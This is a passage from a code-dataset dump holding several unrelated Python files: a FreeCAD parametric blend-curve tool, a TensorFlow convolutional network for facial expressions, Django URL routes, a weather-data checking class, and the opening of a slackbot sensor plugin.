\"Location on second edge\")\n fp.Parameter2 = val\n\n def compute(self, fp):\n e1 = self.getShape(fp, \"Edge1\")\n e2 = self.getShape(fp, \"Edge2\")\n r1 = fp.Parameter1\n if fp.Reverse1:\n r1 = -r1\n if r1 == 0:\n r1 = 1e50\n r2 = fp.Parameter2\n if fp.Reverse2:\n r2 = -r2\n if r2 == 0:\n r2 = 1e50\n if e1 and e2:\n # p1 = e1.getParameterByLength(fp.Parameter1)\n # p2 = e2.getParameterByLength(fp.Parameter2)\n c1 = blend_curve.PointOnEdge(e1)\n c1.distance = r1\n c1.continuity = self.getContinuity(fp.Continuity1)\n # c1.scale = fp.Scale1\n c2 = blend_curve.PointOnEdge(e2)\n c2.distance = r2\n c2.continuity = self.getContinuity(fp.Continuity2)\n # c2.scale = fp.Scale2\n bc = blend_curve.BlendCurve(c1, c2)\n bc.nb_samples = 200\n # bc.auto_scale()\n bc.scale1 = fp.Scale1\n bc.scale2 = fp.Scale2\n bc.perform()\n return bc\n\n def execute(self, fp):\n bc = self.compute(fp)\n if (bc is None) or (bc.curve is None):\n fp.CurvePts = []\n fp.Shape = Part.Shape()\n return None\n if fp.AutoScale:\n bc.scale1 = .01\n bc.scale2 = .01\n bc.auto_orient()\n bc.minimize_curvature()\n fp.Scale1 = bc.scale1\n fp.Scale2 = bc.scale2\n fp.CurvePts = bc.curve.getPoles()\n if fp.Output in [\"Wire\", \"Joined\"]:\n w = Part.Wire(bc.point1.rear_segment() + [bc.shape] + bc.point2.front_segment())\n if fp.Output == \"Joined\":\n w = w.approximate(1e-7, 1e-7, 99, 9).toShape()\n else:\n w = bc.shape\n fp.Shape = w\n\n def onChanged(self, fp, prop):\n if 'Restore' in fp.State:\n return\n if prop == \"AutoScale\" and fp.AutoScale:\n fp.setEditorMode(\"Scale1\", 2)\n fp.setEditorMode(\"Scale2\", 2)\n if prop == \"AutoScale\" and not fp.AutoScale:\n fp.setEditorMode(\"Scale1\", 0)\n fp.setEditorMode(\"Scale2\", 0)\n elif prop == \"Scale1\":\n if fp.Scale1 == 0:\n fp.Scale1 = 0.0001\n if not fp.AutoScale:\n self.execute(fp)\n elif prop == \"Scale2\":\n if fp.Scale2 == 0:\n fp.Scale2 = 0.0001\n if not fp.AutoScale:\n self.execute(fp)\n elif prop == \"Parameter1\":\n e1 = self.getShape(fp, \"Edge1\")\n if fp.Parameter1 > e1.Length:\n fp.Parameter1 = e1.Length\n elif fp.Parameter1 < 0.0:\n fp.Parameter1 = 0.0\n elif prop == \"Parameter2\":\n e2 = self.getShape(fp, \"Edge2\")\n if fp.Parameter2 > e2.Length:\n fp.Parameter2 = e2.Length\n elif fp.Parameter2 < 0.0:\n fp.Parameter2 = 0.0\n if prop in (\"Parameter1\", \"Parameter2\",\n \"Continuity1\", \"Continuity2\"\n \"Output\"):\n self.execute(fp)\n\n def onDocumentRestored(self, fp):\n debug(\"{} restored !\".format(fp.Label))\n fp.setEditorMode(\"CurvePts\", 2)\n self.check_minimize(fp)\n self.migrate(fp)\n\n def getContinuity(self, cont):\n if cont == \"C0\":\n return 0\n elif cont == \"G1\":\n return 1\n elif cont == \"G2\":\n return 2\n elif cont == \"G3\":\n return 3\n else:\n return 4\n\n\nclass pointEditor(object):\n \"\"\"Interpolation curve free-hand editor\n my_editor = pointEditor([points],obj)\n obj is the FreeCAD object that will receive\n the curve shape at the end of editing.\n points can be :\n - Vector (free point)\n - (Vector, shape) (point on shape)\"\"\"\n def __init__(self, points=[], fp=None):\n self.points = list()\n self.fp = fp\n self.curve = None\n self.root_inserted = False\n self.ctrl_keys = {\"i\": [self.insert],\n \"v\": [self.text_change],\n \"q\": [self.quit],\n \"\\uffff\": [self.remove_point]}\n for p in points:\n if isinstance(p, FreeCAD.Vector):\n self.points.append(manipulators.ShapeSnap(p))\n elif isinstance(p, (tuple, list)):\n self.points.append(manipulators.ShapeSnap(p[0], p[1]))\n elif isinstance(p, manipulators.ShapeSnap):\n self.points.append(p)\n elif isinstance(p, manipulators.CustomText):\n self.points.append(p)\n else:\n FreeCAD.Console.PrintError(\"pointEditor : bad input\")\n for p in points:\n if hasattr(p, \"ctrl_keys\"):\n for key in p.ctrl_keys:\n if key in self.ctrl_keys:\n # print(key)\n self.ctrl_keys[key].extend(p.ctrl_keys[key])\n else:\n self.ctrl_keys[key] = p.ctrl_keys[key]\n # Setup coin objects\n if self.fp:\n self.guidoc = self.fp.ViewObject.Document\n else:\n if not FreeCADGui.ActiveDocument:\n self.guidoc = FreeCAD.newDocument(\"New\")\n self.guidoc = FreeCADGui.ActiveDocument\n self.view = self.guidoc.ActiveView\n self.rm = self.view.getViewer().getSoRenderManager()\n self.sg = self.view.getSceneGraph()\n self.setup_InteractionSeparator()\n\n def setup_InteractionSeparator(self):\n if self.root_inserted:\n self.sg.removeChild(self.root)\n self.root = graphics.InteractionSeparator(self.rm)\n self.root.setName(\"InteractionSeparator\")\n # self.root.ovr_col = \"yellow\"\n # self.root.sel_col = \"green\"\n self.root.pick_radius = 40\n # self.root.on_drag.append(self.update_curve)\n # Keyboard callback\n # self.events = coin.SoEventCallback()\n self._controlCB = self.root.events.addEventCallback(coin.SoKeyboardEvent.getClassTypeId(), self.controlCB)\n # populate root node\n # self.root.addChild(self.events)\n self.root += self.points\n self.build_lines()\n self.root += self.lines\n # set FreeCAD color scheme\n for o in self.points: # + self.lines:\n o.ovr_col = \"yellow\"\n o.sel_col = \"green\"\n self.root.register()\n self.sg.addChild(self.root)\n self.root_inserted = True\n self.root.selected_objects = list()\n\n def build_lines(self):\n self.lines = list()\n for m in self.points:\n if isinstance(m, manipulators.TangentSnap):\n line = manipulators.Line([m.parent, m])\n line.dynamic = False\n line.set_color(\"blue\")\n self.lines.append(line)\n\n def controlCB(self, attr, event_callback):\n event = event_callback.getEvent()\n if event.getState() == event.UP:\n # FreeCAD.Console.PrintMessage(\"Key pressed : %s\\n\"%event.getKey())\n if chr(event.getKey()) in self.ctrl_keys:\n for foo in self.ctrl_keys[chr(event.getKey())]:\n if foo.__self__ is self:\n foo()\n elif foo.__self__.parent in self.root.selected_objects:\n foo()\n\n def remove_point(self):\n pts = list()\n for o in self.root.dynamic_objects:\n if isinstance(o, manipulators.Object3D):\n pts.append(o)\n self.points = pts\n self.setup_InteractionSeparator()\n\n def insert(self):\n # get selected lines and subdivide them\n # pts = []\n for o in self.root.selected_objects:\n # p1 = o.points[0]\n mark = manipulators.ShapeSnap(o.points, o.snap_shape)\n self.points.append(mark)\n # new_select.append(mark)\n # self.points.append(pts)\n self.setup_InteractionSeparator()\n # self.root.selected_objects = new_select\n return True\n\n def text_change(self):\n for o in self.root.selected_objects:\n if o._text_type == 2:\n o._text_type = 0\n else:\n o._text_type += 1\n\n def quit(self):\n self.root.events.removeEventCallback(coin.SoKeyboardEvent.getClassTypeId(), self._controlCB)\n self.root.unregister()\n # self.root.removeAllChildren()\n self.sg.removeChild(self.root)\n self.root_inserted = False\n\n\nclass BlendCurveVP:\n def __init__(self, vobj):\n vobj.Proxy = self\n self.select_state = True\n self.active = False\n self.ps = 1.0\n\n def getIcon(self):\n return(TOOL_ICON)\n\n def attach(self, vobj):\n self.Object = vobj.Object\n self.active = False\n self.select_state = vobj.Selectable\n self.ps = 1.0\n self.ip = None\n\n def get_length(self, edge, point):\n try:\n return edge.Curve.toShape(edge.FirstParameter, edge.Curve.parameter(point)).Length\n except Part.OCCError:\n return 0.0\n\n def get_param(self, edge, point):\n try:\n return edge.Curve.parameter(point)\n except Part.OCCError:\n return 0.0\n\n def update_shape(self):\n e1 = self.Object.Proxy.getShape(self.Object, \"Edge1\")\n e2 = self.Object.Proxy.getShape(self.Object, \"Edge2\")\n if self.bc:\n # self.bc.constraints = []\n # bc = nurbs_tools.blendCurve(e1, e2)\n v = Part.Vertex(self.m1.point)\n proj = v.distToShape(self.m1.snap_shape)[1][0][1]\n param1 = self.get_param(e1, proj) # self.get_length(e1, proj)\n # bc.param1 = (pa1 - self.m1.snap_shape.FirstParameter) / (self.m1.snap_shape.LastParameter - self.m1.snap_shape.FirstParameter)\n cont1 = self.Object.Proxy.getContinuity(self.c1.text[0])\n self.bc.point1 = blend_curve.PointOnEdge(e1, param1, cont1)\n self.bc.scale1 = self.t1.parameter\n\n v = Part.Vertex(self.m2.point)\n proj = v.distToShape(self.m2.snap_shape)[1][0][1]\n param2 = self.get_param(e2, proj) # self.get_length(e2, proj)\n # bc.param2 = (pa2 - self.m2.snap_shape.FirstParameter) / (self.m2.snap_shape.LastParameter - self.m2.snap_shape.FirstParameter)\n cont2 = self.Object.Proxy.getContinuity(self.c2.text[0])\n self.bc.point2 = blend_curve.PointOnEdge(e2, param2, cont2)\n self.bc.scale2 = -self.t2.parameter\n\n self.bc.perform()\n self.Object.Shape = self.bc.shape\n for obj in self.Object.InList:\n if \"Curves.ParametricComb.Comb\" in str(obj.Proxy):\n obj.Proxy.execute(obj)\n return self.bc\n\n def setEdit(self, vobj, mode=0):\n debug(\"BlendCurve Edit mode = {}\".format(mode))\n if mode == 0:\n if vobj.Selectable:\n self.select_state = True\n vobj.Selectable = False\n self.ps = vobj.PointSize\n vobj.PointSize = 0.0\n pts = list()\n self.bc = self.Object.Proxy.compute(self.Object)\n\n # e1 = self.getShape(self.Object, \"Edge1\", \"Edge\")\n # e2 = self.getShape(self.Object, \"Edge2\", \"Edge\")\n # pa1 = e1.getParameterByLength(self.Object.Parameter1)\n # pa2 = e2.getParameterByLength(self.Object.Parameter2)\n\n d = self.bc.point1.point.distanceToPoint(self.bc.point2.point)\n\n self.m1 = manipulators.EdgeSnapAndTangent(self.bc.point1.point, self.bc.point1.edge)\n self.m1.set_color(\"cyan\")\n self.m1.marker.markerIndex = coin.SoMarkerSet.CIRCLE_LINE_9_9\n pts.append(self.m1)\n self.c1 = manipulators.CycleText(self.m1)\n self.c1.text_list = [\"C0\", \"G1\", \"G2\", \"G3\", \"G4\"]\n self.c1.text = self.Object.Continuity1\n self.c1.show()\n pts.append(self.c1)\n\n self.t1 = manipulators.TangentSnap(self.m1)\n self.t1._scale = d / 3.0\n self.t1.parameter = self.Object.Scale1\n pts.append(self.t1)\n self.tt1 = manipulators.ParameterText(self.t1)\n self.tt1.show()\n pts.append(self.tt1)\n\n self.m2 = manipulators.EdgeSnapAndTangent(self.bc.point2.point, self.bc.point2.edge)\n self.m2.set_color(\"red\")\n self.m2.marker.markerIndex = coin.SoMarkerSet.CIRCLE_LINE_9_9\n pts.append(self.m2)\n self.c2 = manipulators.CycleText(self.m2)\n self.c2.text_list = [\"C0\", \"G1\", \"G2\", \"G3\", \"G4\"]\n self.c2.text = self.Object.Continuity2\n self.c2.show()\n pts.append(self.c2)\n\n self.t2 = manipulators.TangentSnap(self.m2)\n self.t2._scale = d / 3.0\n self.t2.parameter = -self.Object.Scale2\n pts.append(self.t2)\n self.tt2 = manipulators.ParameterText(self.t2)\n self.tt2.show()\n pts.append(self.tt2)\n\n self.ip = pointEditor(pts, self.Object)\n debug(\"pointEditor created\\n\")\n self.ip.root.on_drag.append(self.update_shape)\n self.active = True\n return True\n return False\n\n def unsetEdit(self, vobj, mode=0):\n e1 = self.Object.Proxy.getShape(self.Object, \"Edge1\")\n e2 = self.Object.Proxy.getShape(self.Object, \"Edge2\")\n if isinstance(self.ip, pointEditor):\n v = Part.Vertex(self.m1.point)\n proj = v.distToShape(self.m1.snap_shape)[1][0][1]\n # pa1 = e1.Curve.parameter(proj)\n self.Object.Parameter1 = self.get_length(e1, proj) # e1.Curve.toShape(e1.FirstParameter, pa1).Length\n self.Object.Scale1 = self.t1.parameter\n self.Object.Continuity1 = self.c1.text[0]\n\n v = Part.Vertex(self.m2.point)\n proj = v.distToShape(self.m2.snap_shape)[1][0][1]\n # pa2 = e2.Curve.parameter(proj)\n # self.Object.Parameter2 = (pa2 - self.m2.snap_shape.FirstParameter) / (self.m2.snap_shape.LastParameter - self.m2.snap_shape.FirstParameter)\n self.Object.Parameter2 = self.get_length(e2, proj) # e2.Curve.toShape(e2.FirstParameter, pa2).Length\n self.Object.Scale2 = -self.t2.parameter\n self.Object.Continuity2 = self.c2.text[0]\n\n vobj.Selectable = self.select_state\n vobj.PointSize = self.ps\n self.ip.quit()\n self.ip = None\n self.active = False\n # vobj.Visibility = True\n return True\n\n def doubleClicked(self, vobj):\n if not hasattr(self, 'active'):\n self.active = False\n if not self.active:\n self.active = True\n # self.setEdit(vobj)\n vobj.Document.setEdit(vobj)\n else:\n vobj.Document.resetEdit()\n self.active = False\n FreeCAD.ActiveDocument.recompute()\n return True\n\n def __getstate__(self):\n return {\"name\": self.Object.Name}\n\n def __setstate__(self, state):\n self.Object = FreeCAD.ActiveDocument.getObject(state[\"name\"])\n return None\n\n def getChildren(self):\n return [self.Object.Edge1[0], self.Object.Edge2[0]]\n\n # def claimChildren(self):\n # return self.getChildren()\n\n\nclass oldBlendCurveVP:\n def __init__(self, obj):\n debug(\"VP init\")\n obj.Proxy = self\n self.build()\n # self.children = []\n\n def claimChildren(self):\n if hasattr(self, \"children\"):\n return(self.children)\n else:\n return []\n\n def build(self):\n self.active = False\n if not hasattr(self, 'switch'):\n self.sg = FreeCADGui.ActiveDocument.ActiveView.getSceneGraph()\n self.switch = coin.SoSwitch()\n if hasattr(self, 'Object'):\n self.switch.setName(\"{}_ControlPoints\".format(self.Object.Name))\n self.empty = coin.SoSeparator() # Empty node\n self.node = coin.SoSeparator()\n self.coord = CoinNodes.coordinate3Node()\n self.poly = CoinNodes.polygonNode((0.5, 0.5, 0.5), 1)\n self.marker = CoinNodes.markerSetNode((1, 0, 0), coin.SoMarkerSet.DIAMOND_FILLED_7_7)\n self.node.addChild(self.coord)\n self.node.addChild(self.poly)\n self.node.addChild(self.marker)\n self.switch.addChild(self.empty)\n self.switch.addChild(self.node)\n self.sg.addChild(self.switch)\n\n def setVisi(self, objs, vis):\n for o in objs:\n o.ViewObject.Visibility = vis\n\n def attach(self, vobj):\n debug(\"VP attach\")\n self.Object = vobj.Object\n self.children = []\n # self.claimed = False\n\n def updateData(self, fp, prop):\n if prop == \"CurvePts\":\n if hasattr(self, 'coord') and hasattr(self, 'poly'):\n self.coord.points = fp.CurvePts\n self.poly.vertices = self.coord.points\n self.marker.color = [(1, 0, 0)] * (len(fp.CurvePts) - 1) + [(1, 1, 0)]\n elif prop == \"Output\":\n if fp.Output in (\"Wire\", \"Joined\"):\n if self.children == []:\n if fp.Edge1[0] == fp.Edge2[0]:\n self.children = [fp.Edge1[0]]\n else:\n self.children = [fp.Edge1[0], fp.Edge2[0]]\n self.setVisi(self.children, False)\n # self.claimed = True\n else:\n if not self.children == []:\n self.setVisi(self.children, True)\n # self.claimed = True\n self.children = []\n\n def onChanged(self, vp, prop):\n if prop == \"Visibility\":\n if (vp.Visibility is True) and (self.active is True):\n self.switch.whichChild = 1\n elif (vp.Visibility is False) and (self.active is True):\n self.switch.whichChild = 0\n\n def doubleClicked(self, vobj):\n if not hasattr(self, 'active'):\n self.active = False\n if not self.active:\n self.active = True\n if (vobj.Visibility is True):\n self.switch.whichChild = 1\n else:\n self.active = False\n self.switch.whichChild = 0\n # self.Object.DegreeMax = self.Object.DegreeMax\n self.Object.Document.recompute()\n return True\n\n def setEdit(self, vobj, mode):\n debug(\"Start Edit\")\n return True\n\n def unsetEdit(self, vobj, mode):\n debug(\"End Edit\")\n return True\n\n def getIcon(self):\n # if self.active:\n # return(_utils.iconsPath() + '/blend2.svg')\n return TOOL_ICON\n\n def __getstate__(self):\n return({\"name\": self.Object.Name})\n\n def __setstate__(self, state):\n debug(\"setstate\")\n self.Object = FreeCAD.ActiveDocument.getObject(state[\"name\"])\n self.build()\n return None\n\n def onDelete(self, feature, subelements):\n if hasattr(self, 'active'):\n if self.active:\n self.sg.removeChild(self.switch)\n return True\n\n\nclass ParametricBlendCurve:\n \"\"\"Prepare selection and create blendCurve FeaturePython object.\"\"\"\n def getEdge(self, edge):\n if \"Line\" in edge[1]:\n return edge[0].Shape\n n = eval(edge[1].lstrip('Edge'))\n return edge[0].Shape.Edges[n - 1]\n\n def normalizedParam(self, edge, par, endClamp=False):\n e = self.getEdge(edge)\n goodpar = (par - e.FirstParameter) * 1.0 / (e.LastParameter - e.FirstParameter)\n if endClamp:\n if goodpar < 0.1:\n goodpar = 0.0\n elif goodpar > 0.9:\n goodpar = 1.0\n return goodpar\n\n def get_distance(self, edge, par, endClamp=False):\n e = self.getEdge(edge)\n ne = e.Curve.toShape(e.FirstParameter, par)\n dist = ne.Length\n if endClamp:\n if dist / e.Length < 0.05:\n dist = 0.0\n elif dist / e.Length > 0.95:\n dist = e.Length\n return dist\n\n def parseSel(self, selectionObject):\n res = []\n param = []\n for obj in selectionObject:\n for i in range(len(obj.SubObjects)):\n so = obj.SubObjects[i]\n if isinstance(so, Part.Edge):\n res.append([obj.Object, obj.SubElementNames[i]])\n p = obj.PickedPoints[i]\n poe = so.distToShape(Part.Vertex(p))\n par = poe[2][0][2]\n param.append(par)\n return res, param\n\n def line(self, ed, p):\n e = self.getEdge(ed)\n pt = e.valueAt(p)\n t = e.tangentAt(p).multiply(100000)\n line = Part.LineSegment(pt, pt.add(t)).toShape()\n return line\n\n #def getOrientation(self, e1, p1, e2, p2):\n #r1 = -1.0\n #r2 = 1.0\n #l1 = self.line(e1, p1)\n #l2 = self.line(e2, p2)\n #dts = l1.distToShape(l2)\n #par1 = dts[2][0][2]\n #par2 = dts[2][0][5]\n #if par1:\n #r1 = 1.0\n #if par2:\n #r2 = -1.0\n #return r1, r2\n\n def Activated(self):\n s = FreeCADGui.Selection.getSelectionEx()\n edges, param = self.parseSel(s)\n if len(edges) > 1:\n for j in range(int(len(edges) / 2)):\n i = j * 2\n obj = FreeCAD.ActiveDocument.addObject(\"Part::FeaturePython\", \"Blend Curve\")\n BlendCurveFP(obj, edges[i: i + 2])\n BlendCurveVP(obj.ViewObject)\n obj.Parameter1 = self.get_distance(edges[i], param[i], True)\n obj.Parameter2 = self.get_distance(edges[i + 1], param[i + 1], True)\n obj.Continuity1 = \"G1\"\n obj.Continuity2 = \"G1\"\n obj.Output = \"Single\"\n #ori1, ori2 = self.getOrientation(edges[i], param[i], edges[i + 1], param[i + 1])\n #obj.Scale1 = ori1\n #obj.Scale2 = ori2\n bc = obj.Proxy.compute(obj)\n bc.auto_scale()\n bc.minimize_curvature()\n obj.Scale1 = bc.point1.size\n obj.Scale2 = bc.point2.size\n FreeCAD.ActiveDocument.recompute()\n\n def GetResources(self):\n return {'Pixmap': TOOL_ICON,\n 'MenuText': __title__,\n 'ToolTip': __doc__}\n\n\nFreeCADGui.addCommand('ParametricBlendCurve', ParametricBlendCurve())\n","repo_name":"tomate44/CurvesWB","sub_path":"freecad/Curves/ParametricBlendCurve.py","file_name":"ParametricBlendCurve.py","file_ext":"py","file_size_in_byte":27210,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"61"} +{"seq_id":"4043413154","text":"#Nicholas McKillip -class on convolutional neural netwroks \n# on the fer2013 facial expression recognition dataset\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib as mpl\nmpl.use('TkAgg')\nimport matplotlib.pyplot as plt\nfrom util import getData, y2indicator, error_rate, init_weight_and_bias, getImageData, init_filter\nfrom sklearn.utils import shuffle\n\nclass ConvPoolLayer(object):\n\tdef __init__(self, mi, mo, fw=5, fh=5, poolsz=(2,2)):\n\t\tsz = (fw, fh, mi, mo)\n\t\tW0 = init_filter(sz, poolsz)\n\t\tself.W = tf.Variable(W0)\n\t\tb0 = np.zeros(mo, dtype = np.float32)\n\t\tself.b = tf.Variable(b0)\n\t\tself.poolsz = poolsz\n\t\tself.params = [self.W, self.b]\n\n\tdef forward(self, X):\n\t\tconv_out = tf.nn.conv2d(X, self.W, strides = [1, 1, 1, 1], padding = 'SAME')\n\t\tconv_out = tf.nn.bias_add(conv_out, self.b)\n\t\tpool_out = tf.nn.max_pool(conv_out, ksize=[1,2,2,1], strides=[1,2,2,1],padding = 'SAME')\n\t\treturn tf.tanh(pool_out)\n\n\nclass HiddenLayer(object):\n\tdef __init__(self, M1, M2, an_id):\n\t\tself.id = an_id\n\t\tself.M1 = M1\n\t\tself.M2 = M2\n\t\tW, b = init_weight_and_bias(int(M1), int(M2))\n\t\tself.W = tf.Variable(W.astype(np.float32))\n\t\tself.b = tf.Variable(b.astype(np.float32))\n\t\tself.params = [self.W, self.b]\n\n\tdef forward(self,X):\n\t\treturn tf.nn.relu(tf.matmul(X, self.W) + self.b)\n\nclass CNN(object):\n\tdef __init__(self, convpool_layer_sizes, hidden_layer_sizes):\n\t\tself.convpool_layer_sizes = convpool_layer_sizes\n\t\tself.hidden_layer_sizes = hidden_layer_sizes\n\n\tdef fit(self, X, Y, lr = 10e-4, mu =0.99, decay = 0.999, reg = 10e-3 , epochs = 3, batch_sz = 32, show_fig = True):\n\t\tlr = np.float32(lr)\n\t\tmu = np.float32(mu)\n\t\treg = np.float32(reg)\n\t\tdecay = np.float32(decay)\n\t\tK = len(set(Y))\n\n\t\t# make a validation set\n\t\tX, Y = shuffle(X, Y)\n\t\tX = X.astype(np.float32)\n\t\tY = y2indicator(Y).astype(np.float32)\n\t\tXvalid, Yvalid = X[-1000:], Y[-1000:]\n\t\tYvalid_flat = np.argmax(Yvalid, axis = 1)\n\t\tX, Y = X[:-1000], Y[:-1000]\n\n\t\tN, d, d, c = X.shape\n\t\tmi = c\n\t\toutw = d\n\t\touth = d\n\t\tself.convpool_layers = []\n\t\tfor mo, fw, fh in self.convpool_layer_sizes:\n\t\t\tlayer = ConvPoolLayer(mi, mo, fw, fh)\n\t\t\tself.convpool_layers.append(layer)\n\t\t\toutw = outw / 2\n\t\t\touth = outh / 2\n\t\t\tmi = mo\n\t\t# intialize hidden layers\n\t\tself.hidden_layers = []\n\t\tM1 = self.convpool_layer_sizes[-1][0]*outw*outh\n\t\tcount = 0\n\t\tfor M2 in self.hidden_layer_sizes:\n\t\t\th = HiddenLayer(M1, M2, count)\n\t\t\tself.hidden_layers.append(h)\n\t\t\tM1 = M2 #output of last layer is input of next\n\t\t\tcount += 1\n\n\t\t# initaliz params of output layers\n\t\tW, b = init_weight_and_bias(M1, K)\n\t\tself.W = tf.Variable(W, 'W_logreg')\n\t\tself.b = tf.Variable(b, 'b_logreg')\n\n\t\tself.params = [self.W, self.b]\n\t\tfor h in self.convpool_layers:\n\t\t\tself.params += h.params\n\t\tfor h in self.hidden_layers:\n\t\t\tself.params += h.params\n\n\t\ttfX = tf.placeholder(tf.float32, shape = (None, d, d, c), name = 'X')\n\t\ttfY = tf.placeholder(tf.float32, shape = (None, K), name = 'Y')\n\t\tact = self.forward(tfX)\n\n\n\t\trcost = reg*sum([tf.nn.l2_loss(p) for p in self.params])\n\t\tcost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits = act, labels = tfY)) + rcost\n\t\tpredction = self.predict(tfX)\n\t\ttrain_op = tf.train.AdamOptimizer().minimize(cost)\n\n\t\tn_batches = int(N / batch_sz)\n\t\tcosts = []\n\t\tinit = tf.global_variables_initializer()\n\t\twith tf.Session() as session:\n\t\t\tsession.run(init)\n\t\t\tfor i in range(epochs):\n\t\t\t\tX, Y = shuffle(X, Y)\n\t\t\t\tfor j in range(n_batches):\n\t\t\t\t\tXbatch = X[j*batch_sz:(j*batch_sz + batch_sz)]\n\t\t\t\t\tYbatch = Y[j*batch_sz:(j*batch_sz + batch_sz)]\n\n\t\t\t\t\tsession.run(train_op, feed_dict={tfX: Xbatch, tfY: Ybatch})\n\n\t\t\t\t\tif j % 20 == 0:\n\t\t\t\t\t\tc = session.run(cost, feed_dict = {tfX: Xvalid, tfY: Yvalid})\n\t\t\t\t\t\tcosts.append(c)\n\n\t\t\t\t\t\tp = session.run(predction, feed_dict = {tfX: Xvalid, tfY: Yvalid})\n\t\t\t\t\t\te = error_rate(Yvalid_flat, p)\n\t\t\t\t\t\tprint(\"i:\", i, \"j:\", j, \"nb:\", n_batches, \"cost:\", c, \"error_rate\", e)\n\n\t\tif show_fig:\n\t\t\tplt.plot(costs)\n\t\t\tplt.show()\n\n\tdef forward(self, X):\n\t\tZ = X\n\t\tfor c in self.convpool_layers:\n\t\t\tZ = c.forward(Z)\n\t\tZ_shape = Z.get_shape().as_list()\n\t\tZ = tf.reshape(Z,[-1, np.prod(Z_shape[1:])])\n\t\tfor h in self.hidden_layers:\n\t\t\tZ = h.forward(Z)\n\t\treturn tf.matmul(Z, self.W) + self.b\n\n\tdef predict(self, X):\n\t\tact = self.forward(X)\n\t\treturn tf.argmax(act,1)\n\n\n\ndef main():\n\tX, Y = getImageData()\n\n\tmodel = CNN(\n\t\tconvpool_layer_sizes=[(20,5,5), (20,5,5)],\n\t\thidden_layer_sizes = [500, 300],\n\t\t)\n\tmodel.fit(X,Y, show_fig=True)\n\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"NickMcKillip/deep_learning_practice","sub_path":"tensorcnnproj.py","file_name":"tensorcnnproj.py","file_ext":"py","file_size_in_byte":4462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33088179807","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^settings/$', views.blog_settings, name='blog_settings'),\n url(r'^$', views.IndexList.as_view(), name='index'),\n url(r'^login/$', views.Login.as_view(), name='login'),\n url(r'^logout/$', views.logout, name='logout'),\n url(r'^register/$', views.Register.as_view(), name='register'),\n url(r'^search/$', views.search, name='search'),\n]","repo_name":"jpyamamoto/PythonDjango-PlasmaCMS","sub_path":"settings/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"7041065896","text":"#!/usr/bin/env python3\nfrom Helpers.Config import Config\nfrom copy import deepcopy\nfrom pprint import pformat, pprint\nimport collections\nimport pandas as pd\nfrom Preprocess.dark_sky_management import *\n\nclass WeatherDataCheck(collections.MutableMapping):\n \"\"\"The class for managing the working weather data structures for processing\n\n This application requires a good bit of input because I prefer not\n deriving information from the current location of a computer.\n\n \"\"\"\n def __init__(self,cfg:Config):\n \"\"\"Initialize the weather data management, the data can be rather large so this\n uses a dictionary for the data management\n \n Arguments:\n cfg {Config} -- The initial config object for processing\n \"\"\"\n self.data = dict()\n self.data[\"cfg\"] = deepcopy(cfg) # notice the deep copy for this item\n self.data[\"weather_time_names\"] = ['lat','long','time','day','hm','tz']\n self.data[\"weather_data_names\"] = ['dewPoint','humidity','precipIntensity',\n 'pressure','temperature','uvIndex','visibility',\n 'windBearing','windGust','windSpeed']\n\n # Overloads so that it acts kinda like a dictionary\n def __getitem__(self,key:str) -> str:\n try:\n return self.data[self.__keytransform__(key)]\n except KeyError as e:\n print(\"Key error {} : {}\".format(e,self.__keytransform__(key)))\n def __setitem__(self,key:str,value):\n self.data[self.__keytransform__(key)] = value\n def __delitem__(self,key:str):\n del self.data[self.__keytransform__(key)]\n def __len__(self):\n return len(self.data)\n def __keytransform__(self, key:str) -> str:\n return key.lower()\n def __iter__(self):\n return iter(self.data)\n def __repr__(self):\n return pformat(self.state())\n # General functions\n def state(self):\n return {\"keys\":self.data.keys(), \"configuration\":self[\"cfg\"]}\n def get_all_weather_names(self):\n return self[\"weather_time_names\"] + self[\"weather_data_names\"]\n # Initialize the pandas\n def set_weather_panda(self):\n \"\"\"Sets up a pandas for processing weather\n\n If the weather file doesn't exist, it builds an empty panda with the correct column names\n \"\"\"\n work_weather = None\n try:\n work_weather = pd.read_csv(self[\"cfg\"][\"weather_file\"])\n except FileNotFoundError:\n if self[\"cfg\"][\"verbose\"]:\n print(\"Building a default panda DataFrame\")\n all_columns = self.get_all_weather_names()\n work_weather = pd.DataFrame(columns=all_columns)\n work_weather.sort_values([\"time\"])\n self[\"weather_panda\"] = work_weather\n print(\"Set Weather Panda {}\".format(self[\"weather_panda\"].shape[0]))\n #\n def check_weather_dates(self):\n \"\"\"Purpose: check that each date has 24 hours of data\n \n \"\"\"\n try:\n df_shape = self[\"weather_panda\"].shape\n num_rows = df_shape[0]\n if num_rows == 0:\n if self[\"cfg\"][\"verbose\"]:\n print(\"Must have data to process.\")\n raise KeyError\n else:\n day_counts = self[\"weather_panda\"].groupby([\"day\"]).size().reset_index(name=\"counts\")\n short_day_counts = day_counts[day_counts['counts'] < 24]\n short_days = short_day_counts.shape\n print(\"The number of short days is: {}\".format(short_days[0]))\n total_data_pts = short_day_counts['counts'].sum()\n print(\"The number of missing data points is: {}\".format(short_days[0]*24 - total_data_pts))\n #Summerize the missing data points\n total_points = self[\"weather_panda\"].shape\n print(\"The number of points found is: {}\".format(total_points[0]))\n \n except KeyError as e:\n raise KeyError(\"The pandas needs to be read in to update the weather file {}\".format(e))\n #\n","repo_name":"draceoptimizer/WeatherAndElectricity","sub_path":"Weather/WeatherDataCheck.py","file_name":"WeatherDataCheck.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"43498942493","text":"import re\nfrom slackbot.bot import listen_to\nfrom . import settings\nimport wirelesstagpy\nimport os\nimport sys\nfrom slackmq import slackmq\nimport chatops\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\ndevice_name = os.environ['DEVICE_NAME']\nchat = chatops.Chatops(settings.servers.homeops.bot_webhook)\n\nif (settings.plugins.wirelesstags.enabled):\n @listen_to(\"^show sensors\", re.IGNORECASE)\n def showsensors(message):\n \"\"\"show sensors\n Display WirelessTags sensor readings for all tags.\n \"\"\"\n if (os.environ['TARGET_DEVICE'] != 'all' and\n 